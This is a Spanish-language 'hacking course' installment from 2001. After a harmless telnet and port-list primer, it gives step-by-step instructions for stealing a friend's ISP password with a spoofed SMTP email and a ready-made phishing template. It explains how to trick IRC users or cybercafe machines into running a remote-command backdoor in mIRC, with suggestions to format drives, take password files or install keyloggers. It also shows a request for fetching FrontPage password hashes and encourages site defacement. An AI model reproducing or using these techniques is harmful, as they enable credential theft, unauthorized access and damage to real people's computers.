Curso de Hacking -3 Entrega (Octubre 2001)

Autor : MartinC para Softdownload

Bienvenidos nuevamente al curso de hacking de Softdownload, he estado ocupado haciendo este curso en
el que tratare de ensearles lo que es telnet, irc, entre otras cosas.
TELNET es el protocolo de "conexin" a otro ordenador, de hecho la
mayoria de los servicios posteriores, se basan en telnet (pe. FTP, HTTP).
Haciendo telnet a una mquina, ejecutas programas en ella, recibiendo tu la
entrada/salida de los datos.
Las direcciones TELNET suelen tener el formato del nombre de dominio
"maquina.remota.ar" o de direccin IP "194.106.2.150" y pueden ir acompaadas
de un nmero al final (el nmero del puerto) si no se nos proporciona el
puerto se asume que el utilizado es el correspondiente al protocolo telnet
por defecto, el 23. Una direccion tpica sera: "maquina.remota.ar 2010"
Qu puedo hacer con TELNET ?
Por telnet se pueden utilizar TODO tipo de servicios, haciendo telnet a
la mquina y puerto correspondientes segun cada caso. Por ejemplo si queremos
utilizar
el servicio POP de nuestro ISP para ver el correo que tenemos, haremos telnet
a la maquina POP por el puerto de este protocolo, el 110. Tambin podemos
consultar grandes bases de datos e incluso acceder a servicios GHOPER o WWW,
muy util si no tenemos acceso a estos servicios por la via normal.
Cmo se hace TELNET ?
Ejecutando un programa cliente de telnet, prcticamente cualquier sistema
operativo lleva uno incluido de serie. Por lo tanto si nos proporcionan la
direccin telnet "maquina.remota.ar 2010" hariamos lo siguiente: (puede
variar segun sistemas):
* Tecleamos en la linea de comandos "TELNET maquina.remota.ar 2010" (En
otros sistemas teclearemos "TELNET" y despus "OPEN maquina.remota.ar
2010" ) con lo que veremos algo parecido a esto:
* telnet MAQUINA.REMOTA.AR 2010
* Trying 130.132.21.53 Port 2010 ...
* Connected to MAQUINA.REMOTA.AR
* Escape character is ...
* Esto nos dice ms o menos que est intentando conectar con la direccin,
nos devuelve la direccin IP, se conecta, y nos dice cual es el "caracter
escape".
* Una vez hemos conectado se nos pide un "login" y/o "password" para entrar
a la mquina remota. En algunos casos podremos conectar a la maquina
remota con el login "guest" (invitado) pero la mayoria de las veces
deberemos saber el login antes de conectarnos.
* El siguiente paso es configurar la emulacin de terminal, es decir,
decirle al sitio remoto como queremos que nos muestre los datos en
nuestra pantalla. La configuracin ms comn es la VT100, que es la

estandar para las comunicaciones basadas en terminales. (algunos clientes

telnet configuran ellos slos la emulacin).
* El ltimo paso (despus de haber utilizado el servicio es salir ;-) Como
las pulsaciones de tecla no las hacemos "realmente" en nuestra mquina,
sino en la mquina remota, necesitamos el "caracter escape" que se nos
di al conectar para pasar al "modo comando" ( habitualmente teclas
control + parntesis derecho ).
Comandos disponibles:
CLOSE
Termina la conexin TELNET con la maquina remota y vuelve al
"modo comando" (si empezamos alli) o sale de TELNET.
QUIT
Sale del programa TELNET; si ests conectado a una mquina
remota, QUIT te desconecta y luego sale de TELNET.
SET ECHO Si no ves lo que ests escribiendo, o si escribes y ves doble,
este comando soluciona el problema.
OPEN
Abre una conexin a una mquina remota.
Nota: Al presionar las teclas Enter o Return, sales del modo comando TELNET y
vuelves a la sesin TELNET.
4.10.4.- Lista de puertos ms comunes (resumida) :
auth (113)
conference (531)
courier (530)
daytime (13)
discard (9)
domain (53)
echo (7)
efs (520)
exec (512)
finger (79)
ftp (21)
gopher (70)
hostnames (101)
http (80)
ingreslock (1524)
link (87)
login (513)
mtp (57)
nameserver (42)
netbios (139)
netnews (532)
netstat (15)
nntp (119)
pop2 (109)
pop3 (110)
proxy (8080)
qotd (17)
remotefs (556)
rje (77)
sftp (115)
shell (514)
smtp (25)
spooler (515)

sunrpc (111)
supdup (95)
systat (11)
telnet (23)
tempo (526)
tftp (69)
time (37)
uucp (540)
uucp-path (117)
whois (43)
www (80)

Como conseguir la contrasea de acceso a internet de tu amigo

Bien, as que queres ahorrarte algo guita y no pagar por un ISP?
Entonces has venido al lugar indicado, pero, como ya te dije al principio, acordate que yo no me hago
responsable de como utilices esta informacion.
Bueno, vamos a lo interesante!
1- Ejecuta tu programa Telnet
En Windows, Inicio, Ejecutar, Telnet.
En Linux, primero tenes que abrir un shell, y escribir telnet
2- Despus conectate a algn servidor E-Mail anonimo, acordate de conectarte al puerto 25
En Windows "Conectar"
En Linux Abrir
3- Ahora que estas conectado escribi lo siguiente:
HELO [**algun servidor que se te ocurra**]
mail from:[**Webmaster del ISP de tu amigo**]
rcpt to:[**Direccin E-Mail de tu amigo**]
data
Estimado usuario de [**aqu va la compaia de tu amigo**], recientemente, nuestro servidor tuvo una falla
con el archivo de registro de usuarios de internet y algunos problemas con la coneccin, lamentablemente
el archivo de registro fue destruido pero, gracias a una copia de seguridad pudimos rescatar esta
informacin, sin embargo esta copia de seguridad se creo cuando usted aun no haba solicitado nuestro
servicio de internet, por lo que no aparece registrado en ella. Esto ocasionar que cada ves que se trate de
conectar a nuestro servicio de internet, se le ira acumulando cierta cantidad de dinero puesto que no
aparece en nuestros registros.
Para corregir el problema, hemos creado un programa especial, todo lo que tiene que hacer, es enviar un EMail a:
"[**El nombre del ISP de tu amigo**]@GalaxyCorp.com" y en Asunto introducir su "Nombre de usuario" y
"Password"
Gracias,
tu provedor de Internet
4- Presiona enter dos veces, y despus escribi "." (sin las comillas) y presiona de nuevo enter. Despus
solo teclea "quit", y listo.

Bien, digamos que no entendiste por completo las cosas que vos tenes que cambiar, es decir, los lugares
que estan resaltados y que tienen **, asi que dar una descripcin un poco mas detallada:
[**Webmaster del ISP de tu amigo**] - Por ejemplo, si tu amigo esta con aol.com, entonces escribes
"webmaster@aol.com", correcto?
[**Direccin E-Mail de tu amigo**] - Por ejemplo, si el E-Mail de tu amigo es "fred@aol.com", entonces
escribes "fred@aol.com".
[**aqu va la compaia de tu amigo**] - Si tu amigo esta con AOL (America Online), entonces escribes
"America -Online"
"[**El nombre del ISP de tu amigo**]@GalaxyCorp.com" - Esta es la parte dificil, pero no hay por que
preocuparse:
Abri tu navegador, y escribe "http://galaxycorp.com", consgui una cuenta. Cuando te pregunten por el
nombre de usuario que te gustaria, trata de conseguir el mas cercano al nombre del ISP de tu amigo (por
ejemplo, si tu amigo se conecta mediante America Online [AOL] entonces trata "aol" o "a_o_l" o
"america_online"). Y cuando te pregunten por tu E-Mail, escribe el real. O consigue alguna otra cuanta de
E-Mail gratuita, que parezca ser del ISP de tu amigo...
Ahora continua con tu vida normal, y recuerda revisar tu E-Mail, si algn dia te llega un mensage de la
direccin E-Mail de tu amigo, y en el asunto dice "fred f5r6e7d" entonces, podras ahorarte mas de $20
pesos por mes!

KOMO HURGAR EN ORDENADORES AJENOS A TRAVS DEL IRC

------------------------------------------------Bueno, pues ke yo sepa, he enkontrado 2 mtodos:
* MTODO LAMER:
--------------El primero, lo llamo mtodo lamer, porke es en el kual es necesario ke el otro usuario tenga
los menores konocimientos posibles. Resumiendo, ke sea un inkompetente total!.
Konsiste ni ms ni menos en una orden del mIRC: /fserve.
Ahora si alguno no se ha bajado los doks sobre mIRC le tendra ke kastigar y todo eso...
La orden fserve lo ke hace es ke nos ofrece una sesin de dcc get kon el usuario ke indikemos.
Aunke ms bien es al kontrario, el usuario hurgar en nuestro HD.
Enviamos ficheros por dcc, no?? Pues el fserve es ke el usuario se bajar lo ke kiera.
Hasta puede subir y bajar de direktorio, borrar ficheros!, etc....
La orden en konkreto sera:
/fserve nick 5 c:
/fserve ==> La orden en si de mIRC
nick ==> Aki debe ir vuestro nick (si keris hackear vosotros, aunke si ponis EMF, no me
pienso kejar X)
5
==> Es el nmero maximo de ficheros ke os podis bajar simultaneamente. Podis poner el
nmero ke keris.
c:
==> La unidad ke vais a mirar. Si es otra letra..... mal rollo.
Este mtodo es el + lamer, ya ke es necesario:
1.- Ke el to no tenga ni pajolera idea de ke es un fserve.
2.- Ke el to no tenga ningn skript, ya ke normalmente suelen regular el fserve ellos solitos,
kon lo ke si no ests autentifikado por el usuario tendras ke decirle ke te diera krditos
en su fserve. (Siempre se puede praktikar la ingeniera social, pero..... en fin)
3.- Ke al to no se le okurra mirar esas ventanitas ke aparecen (NOTA:
XDDDDDDDDDDDDDDDDDDDDDD)
Vais a un kanal, por ejemplo #amor. Miris la lista de nicks y al ke os de la impresion de ser

ms lamer le abrs un privado, dicindole ke no os funciona una kosa, ke pruebe a hacer la orden
fserve y ya est!.
* METODO MENOS LAMER
-------------------El mtodo menos lamer tambin es un pokillo lamer, pero es ms kachondo!. Consiste en una
orden del mIRC, aunke ms ke una orden, es un komando remoto. Es este:
ctcp 1:*:$1Este komando, introducido en los ctcps de mIRC, ejekuta kualkier orden de forma remota.Es
komo el antiguo /ctpc nick DO.
ctcp ==> Client-To-Client-Protocol. Los version, ping, etc...
1 ==> Nivel de usuario ke ejekuta el ctcp.
* ==> Komo en DOS, komodn ke sustituye al ctcp ke nos hagan. Podramos definir aki un VERSION
PING, etc..
$1- ==> Kon este parmetro, mIRC toma en konsideracin todo lo ke nos enven.
Komo se usa?. Pos muy fcil. Yo he konseguido ke un lamer introduzka eso. Y de repente me
apetece ke el lamer me de op, si la tiene, en el kanal #amor. No?. Pos si tiene hecho eso, est
perdido.... jejejejeje. Tekleo "/ctcp LAMER mode #amor +o EMF". Sin las komillas!!!!
De repente... Dios, tengo op en #amor! :)
Pero de inmediato el lamer se enfada. No me dio op, aunke en el kanal pone ke s!!! :P
Pos me apetece dejarlo a mal kon sus kolegas. Muahahahhhahahhahaaahaahah. Tekleo
"/ctcp LAMER say Sois unos autntikos #@%%$$%$$!!!!" (NOTA: Censored!)
Y me fijo en el kanal y... Oh, cielos!. De repente lamer ha dicho eso!! XD
Pos hala por maledukado le mando esto "/ctcp LAMER quit Me han echado".
Bueno, komo siempre debemos de tener kuidao, ya ke la ventanita se le llenar de mensajitos en
rojo indikando nuestro nick.
La sintaxis ya la habis visto, no?. Para enviar komandos es simple:
/ctcp ==> Le indikamos a LAMER ke le va un CTCP.
LAMER ==> El nick del user, en este kaso LAMER.
A kontinuacin introducimos el komando ke keramos, kon sus parmetros y todas esas kosas, aunke
SIN la barra de introduccin de komandos!!!.
Aado, por cierto, ke si damos konseguido introducrselo al lamer, sera MUY interesante el ke
nos diramos un nivel de usuario en el mIRC. Sino, korremos el riesgo de ke kualkiera se de
kuenta de esto y nos chafe la diversin. Aunke tambin es un kante ke el lamer vea:
100:*!*@ctv666.ctv.es ==> por ejemplo.
en su fichero de users de mIRC!. Eso s. Si aadimos eso, debemos de cambiar el remoto por:
ctcp 100:*:$1Y as solamente usuarios de level 100 (=nosotrox) podremos ejekutar esto.
Nada ms. Solamente indikaros ke el primer mtodo funciona.... Y si no komeros la kabeza!!!. No
os voi a dar todo hecho :P
El segundo mtodo EST KOMPROBADO. Vas a un ciberkafeto, donde los dueos no saben
normalmente
de la misa la mitad, y pegis eso en el .ini korrespondiente.
Por cierto ke no son los nikos mtodos. Siempre hai kosas ke experimentar y hacer. Sino esto
sera muy aburrido, no kreeis?? ;)
Hai kosas ms interesantes ke se pueden hacer kon la segunda opcin, komo konfigurarle
remotamente el autoexec.bat, formatearle el HD!, etc... O buskar archivos .pwl, instalar
un keylog, etc... Eso ya keda de vuestra kuenta, de si sois hackers o crackers. Para hacer esto
habra ke realizar un skript sino keremos pasarnos 2 horas tekleando komandos. Si me pega la
lokura igual hago uno y lo subo a la pgina. :)

Bueno en este texto vamos a explicar un bug, que abunda en los NTs. El bug es
algo simple, y solo tiene una condicin. La nica condicin es que la vctima
tenga el Front Page Web Server, y el atacante el Front Page full ( el Expres
no sirve ). Los pasos son muy simples.

en el Front Page dirigirse a:

1ro.- File.
2do.- Open a Front Page Web...
3ro.- More Webs.
4to.- Ingresar el Url.
5to.- List Webs.
Esto nos dar como resultado diferentes cosas, o nos da un error, o nos
muestra en el espacio de abajo por ejemplo <ROOT> o el nombre que lleva la
p gina... luego nos resta hacer doble click sobre el nombre de la p gina y
listo. Claro que esto ultimo nos puede tirar diferentes resultados como por
ejemplo. Errores, que nos pida pass y login o que directamente nos muestre
el contenido de este. Si el ultimo es el caso, podremos hackear la page algo
que para mi opinin no es un HACK MODELO.. pero bueno eso queda en cada uno.
Si cuando vamos a intentar este bug en un server y nos encontramos con el login
y el pass, hay formas de poder bajarnos el fichero donde se encuentran los
mismos... esto seria de la siguiente forma.
GET /_vti_pvt/service.pwd esto seria para obtener el fichero que contiene
el login y el pass encriptados.
( .pwd, es la extensin de los ficheros que contiene los pass y logins del
Front Page ).
Despus de esta explicacin breve de este bug, hace falta mencionar que hay
otras formas para conseguir el fichero de pass y login del Front Page, estas
son como por ejemplo el del queryhits.htm, etc... pero creo que con lo que
explique ser suficiente, en todo caso si quieren saciar su hambre por la
informacin, pueden visitar las paginas de Rhino9 ( www.rhino9.ml.org ) o la
de Technotronic ( www.technotronic.com ).
" Algo que me parece importante agregar a este articulo, es que si lo que
realmente quieren es hackear pages, que lo hagan con un propsito, no solo
para decir "HACKED BY YO" y sin ningn significado... lo ideal seria poner un
manifiesto, que ustedes crean sea adecuado y lo sientan. No poner algo por
poner. "

Bueno espero que les haya gustado y esperen el proximo curso, en el que nos meteremos de nuevo en el
mundo del hacking, y tal vez toquemos algo de phreacking (hablar por telefono gratarola).
MartinC
www.softdownload.com.ar